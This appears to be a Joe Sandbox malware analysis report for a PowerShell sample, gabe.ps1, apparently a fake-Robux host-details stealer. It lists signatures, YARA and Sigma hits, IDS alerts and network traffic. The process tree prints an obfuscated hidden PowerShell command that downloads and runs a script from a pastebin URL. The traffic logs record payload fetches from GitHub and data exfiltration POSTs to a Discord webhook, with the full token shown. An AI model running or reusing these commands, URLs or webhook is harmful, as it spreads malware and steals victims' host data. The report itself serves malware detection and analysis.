Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
gabe.ps1

Overview

General Information

Sample name:gabe.ps1
Analysis ID:1534233
MD5:b6a2c4784a4fdccaf6147631a09db7b2
SHA1:9bfbd4f78733b48ecc0559063a9bff16d9d431d8
SHA256:9d84b453ea402ce8d38ab552790e5faf353f46a9b38b11a197e74eeade86f252
Tags:Neth3Nps1user-JAMESWT_MHT
Infos:

Detection

Score:84
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Malicious sample detected (through community Yara rule)
Suricata IDS alerts for network traffic
AI detected suspicious sample
Connects to a pastebin service (likely for C&C)
Powershell creates an autostart link
Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
Sigma detected: Suspicious PowerShell Parameter Substring
Suspicious powershell command line found
Tries to open files direct via NTFS file id
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: Change PowerShell Policies to an Insecure Level
Sigma detected: CurrentVersion Autorun Keys Modification
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

Process Tree

  • System is w10x64
  • powershell.exe (PID: 7752 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\gabe.ps1" MD5: 04029E121A0CFA5991749937DD22A1D9)
    • conhost.exe (PID: 7768 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • attrib.exe (PID: 2744 cmdline: "C:\Windows\system32\attrib.exe" +s +h "C:\ProgramData\Microsoft OneDrive\FileSync\BeginSync.lnk" MD5: 5037D8E6670EF1D89FB6AD435F12A9FD)
  • forfiles.exe (PID: 7184 cmdline: "C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m notepad.exe /c "powershell.exe -command powershell -windowstyle h -command 'sal fatbake calc;sal callit iEx; sal $env:os iWr; calliT(WINDOWS_NT pastebin.com/raw/sA04Mwk2 -usebasicparsing)'" MD5: 9BB67AEA5E26CB136F23F29CC48D6B9E)
    • conhost.exe (PID: 7356 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • powershell.exe (PID: 7748 cmdline: -command powershell -windowstyle h -command 'sal fatbake calc;sal callit iEx; sal $env:os iWr; calliT(WINDOWS_NT pastebin.com/raw/sA04Mwk2 -usebasicparsing)' MD5: 04029E121A0CFA5991749937DD22A1D9)
      • powershell.exe (PID: 1076 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle h -command "sal fatbake calc;sal callit iEx; sal $env:os iWr; calliT(WINDOWS_NT pastebin.com/raw/sA04Mwk2 -usebasicparsing)" MD5: 04029E121A0CFA5991749937DD22A1D9)
  • forfiles.exe (PID: 2180 cmdline: "C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m notepad.exe /c "powershell.exe -command powershell -windowstyle h -command 'sal fatbake calc;sal callit iEx; sal $env:os iWr; calliT(WINDOWS_NT pastebin.com/raw/sA04Mwk2 -usebasicparsing)'" MD5: 9BB67AEA5E26CB136F23F29CC48D6B9E)
    • conhost.exe (PID: 6948 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • powershell.exe (PID: 2952 cmdline: -command powershell -windowstyle h -command 'sal fatbake calc;sal callit iEx; sal $env:os iWr; calliT(WINDOWS_NT pastebin.com/raw/sA04Mwk2 -usebasicparsing)' MD5: 04029E121A0CFA5991749937DD22A1D9)
      • powershell.exe (PID: 4084 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle h -command "sal fatbake calc;sal callit iEx; sal $env:os iWr; calliT(WINDOWS_NT pastebin.com/raw/sA04Mwk2 -usebasicparsing)" MD5: 04029E121A0CFA5991749937DD22A1D9)
  • cleanup

Malware Configuration

No configs have been found

Yara Signatures

Memory Dumps

SourceRuleDescriptionAuthorStrings
Process Memory Space: powershell.exe PID: 7752INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXECDetects PowerShell scripts containing patterns of base64 encoded files, concatenation and executionditekSHen
  • 0xa3ca3:$b1: ::WriteAllBytes(
  • 0x2f75a:$s1: -join
  • 0x3c82f:$s1: -join
  • 0x3fc01:$s1: -join
  • 0x402b3:$s1: -join
  • 0x41da4:$s1: -join
  • 0x43faa:$s1: -join
  • 0x447d1:$s1: -join
  • 0x45041:$s1: -join
  • 0x4577c:$s1: -join
  • 0x457ae:$s1: -join
  • 0x457f6:$s1: -join
  • 0x45815:$s1: -join
  • 0x46065:$s1: -join
  • 0x461e1:$s1: -join
  • 0x46259:$s1: -join
  • 0x462ec:$s1: -join
  • 0x46552:$s1: -join
  • 0x486e8:$s1: -join
  • 0x57132:$s1: -join
  • 0x6c87a:$s1: -join
Process Memory Space: powershell.exe PID: 1076INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXECDetects PowerShell scripts containing patterns of base64 encoded files, concatenation and executionditekSHen
  • 0x4a272:$b1: ::WriteAllBytes(
  • 0x17d5eb:$b1: ::WriteAllBytes(
  • 0x1c078:$s1: -join
  • 0x1c7d8:$s1: -join
  • 0xaf68e:$s1: -join
  • 0xb09ff:$s1: -join
  • 0x2a791:$s3: reverse
  • 0x2aa7f:$s3: reverse
  • 0x2b199:$s3: reverse
  • 0x2b952:$s3: reverse
  • 0x32b40:$s3: reverse
  • 0x32f5a:$s3: reverse
  • 0x33ae2:$s3: reverse
  • 0x3478f:$s3: reverse
  • 0x4cc8f:$s3: reverse
  • 0x538c3:$s3: reverse
  • 0x55934:$s3: reverse
  • 0x60963:$s3: reverse
  • 0x6b0ce:$s3: reverse
  • 0x74fb1:$s3: reverse
  • 0x155029:$s3: reverse
Process Memory Space: powershell.exe PID: 4084INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXECDetects PowerShell scripts containing patterns of base64 encoded files, concatenation and executionditekSHen
  • 0x1373ab:$b1: ::WriteAllBytes(
  • 0x4179e:$s1: -join
  • 0x7e3ac:$s1: -join
  • 0x12a635:$s1: -join
  • 0x12ad97:$s1: -join
  • 0xd2b2d:$s3: reverse
  • 0xdcbf0:$s3: reverse
  • 0xe95ad:$s3: reverse
  • 0xe989b:$s3: reverse
  • 0xe9fb5:$s3: reverse
  • 0xea76e:$s3: reverse
  • 0xf181e:$s3: reverse
  • 0xf1c38:$s3: reverse
  • 0xf27c0:$s3: reverse
  • 0xf346d:$s3: reverse
  • 0x1010cc:$s3: reverse
  • 0x105a63:$s3: reverse
  • 0x34e43:$s4: +=
  • 0x4123c:$s4: +=
  • 0x80a9f:$s4: +=
  • 0x85c5e:$s4: +=

Other

SourceRuleDescriptionAuthorStrings
amsi64_7752.amsi.csvINDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXECDetects PowerShell scripts containing patterns of base64 encoded files, concatenation and executionditekSHen
  • 0x1567:$b1: ::WriteAllBytes(
  • 0xd632:$s1: -join
  • 0x6dde:$s4: +=
  • 0x6ea0:$s4: +=
  • 0xb0c7:$s4: +=
  • 0xd1e4:$s4: +=
  • 0xd4ce:$s4: +=
  • 0xd614:$s4: +=
  • 0xf82c:$s4: +=
  • 0xf8ac:$s4: +=
  • 0xf972:$s4: +=
  • 0xf9f2:$s4: +=
  • 0xfbc8:$s4: +=
  • 0xfc4c:$s4: +=
  • 0x1601:$e4: Get-WmiObject
  • 0x16a3:$e4: Get-WmiObject
  • 0xdd15:$e4: Get-WmiObject
  • 0xdf04:$e4: Get-Process
  • 0xdf5c:$e4: Start-Process
amsi64_1076.amsi.csvINDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXECDetects PowerShell scripts containing patterns of base64 encoded files, concatenation and executionditekSHen
  • 0x9a92:$b1: ::WriteAllBytes(
  • 0x8197:$s1: -join
  • 0x1943:$s4: +=
  • 0x1a05:$s4: +=
  • 0x5c2c:$s4: +=
  • 0x7d49:$s4: +=
  • 0x8033:$s4: +=
  • 0x8179:$s4: +=
  • 0xc1bc:$s4: +=
  • 0xc23c:$s4: +=
  • 0xc302:$s4: +=
  • 0xc382:$s4: +=
  • 0xc558:$s4: +=
  • 0xc5dc:$s4: +=
  • 0x9b2c:$e4: Get-WmiObject
  • 0x9bce:$e4: Get-WmiObject
  • 0xa6a5:$e4: Get-WmiObject
  • 0xa894:$e4: Get-Process
  • 0xa8ec:$e4: Start-Process
amsi64_4084.amsi.csvINDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXECDetects PowerShell scripts containing patterns of base64 encoded files, concatenation and executionditekSHen
  • 0x9a92:$b1: ::WriteAllBytes(
  • 0x8197:$s1: -join
  • 0x1943:$s4: +=
  • 0x1a05:$s4: +=
  • 0x5c2c:$s4: +=
  • 0x7d49:$s4: +=
  • 0x8033:$s4: +=
  • 0x8179:$s4: +=
  • 0xc1bc:$s4: +=
  • 0xc23c:$s4: +=
  • 0xc302:$s4: +=
  • 0xc382:$s4: +=
  • 0xc558:$s4: +=
  • 0xc5dc:$s4: +=
  • 0x9b2c:$e4: Get-WmiObject
  • 0x9bce:$e4: Get-WmiObject
  • 0xa6a5:$e4: Get-WmiObject
  • 0xa894:$e4: Get-Process
  • 0xa8ec:$e4: Start-Process

Sigma Signatures

System Summary

barindex
Sigma detected: Suspicious PowerShell Parameter Substring
Source: Process startedAuthor: Florian Roth (Nextron Systems), Daniel Bohannon (idea), Roberto Rodriguez (Fix): Data: Command: -command powershell -windowstyle h -command 'sal fatbake calc;sal callit iEx; sal $env:os iWr; calliT(WINDOWS_NT pastebin.com/raw/sA04Mwk2 -usebasicparsing)', CommandLine: -command powershell -windowstyle h -command 'sal fatbake calc;sal callit iEx; sal $env:os iWr; calliT(WINDOWS_NT pastebin.com/raw/sA04Mwk2 -usebasicparsing)', CommandLine|base64offset|contains: &, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m notepad.exe /c "powershell.exe -command powershell -windowstyle h -command 'sal fatbake calc;sal callit iEx; sal $env:os iWr; calliT(WINDOWS_NT pastebin.com/raw/sA04Mwk2 -usebasicparsing)'", ParentImage: C:\Windows\System32\forfiles.exe, ParentProcessId: 7184, ParentProcessName: forfiles.exe, ProcessCommandLine: -command powershell -windowstyle h -command 'sal fatbake calc;sal callit iEx; sal $env:os iWr; calliT(WINDOWS_NT pastebin.com/raw/sA04Mwk2 -usebasicparsing)', ProcessId: 7748, ProcessName: powershell.exe
Sigma detected: Change PowerShell Policies to an Insecure Level
Source: Process startedAuthor: frack113: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\gabe.ps1", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\gabe.ps1", CommandLine|base64offset|contains: z, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 3968, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\gabe.ps1", ProcessId: 7752, ProcessName: powershell.exe
Sigma detected: CurrentVersion Autorun Keys Modification
Source: Registry Key setAuthor: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split): Data: Details: "C:\ProgramData\Microsoft OneDrive\FileSync\BeginSync.lnk", EventID: 13, EventType: SetValue, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 7752, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\OneDrive File Sync
Sigma detected: Non Interactive PowerShell Process Spawned
Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\gabe.ps1", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\gabe.ps1", CommandLine|base64offset|contains: z, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 3968, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\gabe.ps1", ProcessId: 7752, ProcessName: powershell.exe

Suricata Signatures

TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
2024-10-15T18:06:40.473702+020028576591A Network Trojan was detected192.168.2.1049710162.159.137.232443TCP
2024-10-15T18:06:53.937555+020028576591A Network Trojan was detected192.168.2.1049716162.159.137.232443TCP
2024-10-15T18:07:02.134101+020028576591A Network Trojan was detected192.168.2.1049717162.159.137.232443TCP

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

barindex
AI detected suspicious sample
Source: Submited SampleIntegrated Neural Analysis Model: Matched 97.4% probability
Source: unknownHTTPS traffic detected: 104.20.3.235:443 -> 192.168.2.10:49708 version: TLS 1.2
Source: unknownHTTPS traffic detected: 104.20.3.235:443 -> 192.168.2.10:49708 version: TLS 1.2
Source: unknownHTTPS traffic detected: 162.159.137.232:443 -> 192.168.2.10:49710 version: TLS 1.2
Source: unknownHTTPS traffic detected: 185.199.109.133:443 -> 192.168.2.10:49711 version: TLS 1.2
Source: unknownHTTPS traffic detected: 104.20.4.235:443 -> 192.168.2.10:49713 version: TLS 1.2
Source: unknownHTTPS traffic detected: 185.199.109.133:443 -> 192.168.2.10:49715 version: TLS 1.2
Source: unknownHTTPS traffic detected: 162.159.137.232:443 -> 192.168.2.10:49716 version: TLS 1.2
Source: unknownHTTPS traffic detected: 162.159.137.232:443 -> 192.168.2.10:49717 version: TLS 1.2
Source: Binary string: C:\Windows\mscorlib.pdbpdblib.pdb source: powershell.exe, 00000000.00000002.1718694511.0000027120A89000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: softy.pdb source: powershell.exe, 00000007.00000002.1868361075.000001D219EFC000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.1966785889.0000020ADDE54000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_64\mscorlib\v4.0_4.0.0.0__b77a5c561934e089\mscorlib.pdbd source: powershell.exe, 00000007.00000002.1868361075.000001D219EFC000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: softy.pdbll source: powershell.exe, 0000000C.00000002.1966785889.0000020ADDE54000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\mscorlib.pdbD source: powershell.exe, 0000000C.00000002.1966785889.0000020ADDE54000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\dll\mscorlib.pdb source: powershell.exe, 00000000.00000002.1718694511.0000027120A89000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.1868361075.000001D219EFC000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\dll\System.Management.Automation.pdb source: powershell.exe, 00000000.00000002.1718694511.0000027120A3B000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.1868361075.000001D219F7C000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.1966785889.0000020ADDE54000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: n.pdb source: powershell.exe, 00000000.00000002.1718694511.0000027120A89000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.1870622695.000001D27FB39000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.1966785889.0000020ADDE54000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: ement.Automation.pdb source: powershell.exe, 00000007.00000002.1868361075.000001D219EFC000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.pdbL source: powershell.exe, 00000007.00000002.1868361075.000001D219F47000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.pdb source: powershell.exe, 00000000.00000002.1718694511.0000027120A89000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.1868361075.000001D219F47000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.1966785889.0000020ADDE54000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\System.Management.Automation.pdb source: powershell.exe, 00000000.00000002.1718694511.0000027120A3B000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: Microsoft.PowerShell.Commands.Utility.pdb source: powershell.exe, 00000007.00000002.1869904886.000001D219F9F000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.1966785889.0000020ADDE54000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\System.Management.Automation.pdbint16Ch& source: powershell.exe, 00000007.00000002.1868361075.000001D219F7C000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: b.pdb source: powershell.exe, 0000000C.00000002.1966785889.0000020ADDE54000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\System.Management.Automation.pdb" source: powershell.exe, 0000000C.00000002.1966785889.0000020ADDE54000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Utility\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Utility.pdbvicec source: powershell.exe, 00000007.00000002.1868361075.000001D219EFC000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: System.Management.Automation.pdb source: powershell.exe, 00000000.00000002.1718694511.0000027120A89000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1717033801.0000027120800000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.1867832997.000001D219D8C000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.1966785889.0000020ADDE54000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.1966785889.0000020ADDE16000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\mscorlib.pdb41e source: powershell.exe, 00000007.00000002.1868361075.000001D219F7C000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_64\mscorlib\v4.0_4.0.0.0__b77a5c561934e089\mscorlib.pdb source: powershell.exe, 00000000.00000002.1717033801.0000027120838000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.1966785889.0000020ADDE40000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\Windows\mscorlib.pdbpdblib.pdb' source: powershell.exe, 00000007.00000002.1868361075.000001D219EFC000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: mscorlib.pdb source: powershell.exe, 00000000.00000002.1718694511.0000027120A89000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1718694511.0000027120AF0000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.1867832997.000001D219D8C000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.1966785889.0000020ADDE54000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: agement.Automation.pdb source: powershell.exe, 00000000.00000002.1718694511.0000027120A89000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: Microsoft.PowerShell.Commands.Utility.pdbf source: powershell.exe, 00000000.00000002.1718694511.0000027120A89000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: ws\dll\System.Management.Automation.pdb source: powershell.exe, 00000000.00000002.1718694511.0000027120A3B000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: mscorlib.pdbCLSID\{0A29FF9E-7F9C-4437-8B11-F424491E3931}\InprocServer32 source: powershell.exe, 00000007.00000002.1869904886.000001D219F9F000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: System.Management.Automation.pdb-4437-8B11-F424491E3931}\InprocServer32 source: powershell.exe, 0000000C.00000002.1966785889.0000020ADDE54000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\mscorlib.pdb source: powershell.exe, 0000000C.00000002.1966785889.0000020ADDE54000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\symbols\dll\Microsoft.PowerShell.Commands.Utility.pdb34e089> source: powershell.exe, 0000000C.00000002.1966785889.0000020ADDE54000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: System.Management.Automation.pdb00100010007d1fa57c4aed9f0a32e84aa0faefd0de9e8fd6aec8f87fb03766c834c99921eb23be79ad9d5dcc1dd9ad236132102900b723cf980957fc4e177108fc607774f29e8320e92ea05ece4e821c0a5efe8f1645c4c0c93c1ab99285d622caa652c1dfad63d745d6f2de5f17e5eaf0fc4 source: powershell.exe, 00000007.00000002.1869904886.000001D219F9F000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\dll\Microsoft.PowerShell.Commands.Utility.pdbi source: powershell.exe, 0000000C.00000002.1964099046.0000020ADDA36000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: ws\System.Management.Automation.pdb source: powershell.exe, 00000007.00000002.1868361075.000001D219F7C000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.1966785889.0000020ADDE54000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\Windows\Microsoft.PowerShell.Commands.Utility.pdbpdbity.pdb source: powershell.exe, 00000000.00000002.1717033801.000002712088A000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.1868361075.000001D219F7C000.00000004.00000020.00020000.00000000.sdmp

Networking

barindex
Suricata IDS alerts for network traffic
Source: Network trafficSuricata IDS: 2857659 - Severity 1 - ETPRO MALWARE Win32/Fake Robux Bot Host Details Exfil : 192.168.2.10:49716 -> 162.159.137.232:443
Source: Network trafficSuricata IDS: 2857659 - Severity 1 - ETPRO MALWARE Win32/Fake Robux Bot Host Details Exfil : 192.168.2.10:49710 -> 162.159.137.232:443
Source: Network trafficSuricata IDS: 2857659 - Severity 1 - ETPRO MALWARE Win32/Fake Robux Bot Host Details Exfil : 192.168.2.10:49717 -> 162.159.137.232:443
Connects to a pastebin service (likely for C&C)
Source: unknownDNS query: name: pastebin.com
Source: unknownDNS query: name: pastebin.com
Source: Joe Sandbox ViewIP Address: 104.20.3.235 104.20.3.235
Source: Joe Sandbox ViewIP Address: 162.159.137.232 162.159.137.232
Source: Joe Sandbox ViewIP Address: 104.20.4.235 104.20.4.235
Source: Joe Sandbox ViewIP Address: 104.20.4.235 104.20.4.235
Source: Joe Sandbox ViewASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
Source: Joe Sandbox ViewASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
Source: Joe Sandbox ViewJA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
Source: global trafficHTTP traffic detected: GET /raw/sA04Mwk2 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: pastebin.comConnection: Keep-Alive
Source: global trafficHTTP traffic detected: POST /api/webhooks/1295751966227566694/ZDOwsWbEeGMPmjLUQsSudsSfhqvBoNBR93K3nrkS5aL7Ewva-6hqlEBSmLu1WVR5cEN5 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Content-Type: application/jsonHost: discord.comContent-Length: 298Expect: 100-continueConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /Neth3N/na9ow3495raygwi4gyrhuawerawera/main/gaber.txt HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: raw.githubusercontent.comConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /raw/sA04Mwk2 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: pastebin.comConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /Neth3N/na9ow3495raygwi4gyrhuawerawera/main/gaber.txt HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: raw.githubusercontent.comConnection: Keep-Alive
Source: global trafficHTTP traffic detected: POST /api/webhooks/1295751966227566694/ZDOwsWbEeGMPmjLUQsSudsSfhqvBoNBR93K3nrkS5aL7Ewva-6hqlEBSmLu1WVR5cEN5 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Content-Type: application/jsonHost: discord.comContent-Length: 298Connection: Keep-Alive
Source: global trafficHTTP traffic detected: POST /api/webhooks/1295751966227566694/ZDOwsWbEeGMPmjLUQsSudsSfhqvBoNBR93K3nrkS5aL7Ewva-6hqlEBSmLu1WVR5cEN5 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Content-Type: application/jsonHost: discord.comContent-Length: 298Connection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /raw/sA04Mwk2 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: pastebin.comConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /Neth3N/na9ow3495raygwi4gyrhuawerawera/main/gaber.txt HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: raw.githubusercontent.comConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /raw/sA04Mwk2 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: pastebin.comConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /Neth3N/na9ow3495raygwi4gyrhuawerawera/main/gaber.txt HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: raw.githubusercontent.comConnection: Keep-Alive
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: global trafficHTTP traffic detected: GET /raw/sA04Mwk2 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: pastebin.comConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /Neth3N/na9ow3495raygwi4gyrhuawerawera/main/gaber.txt HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: raw.githubusercontent.comConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /raw/sA04Mwk2 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: pastebin.comConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /Neth3N/na9ow3495raygwi4gyrhuawerawera/main/gaber.txt HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: raw.githubusercontent.comConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /raw/sA04Mwk2 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: pastebin.comConnection: Keep-Alive
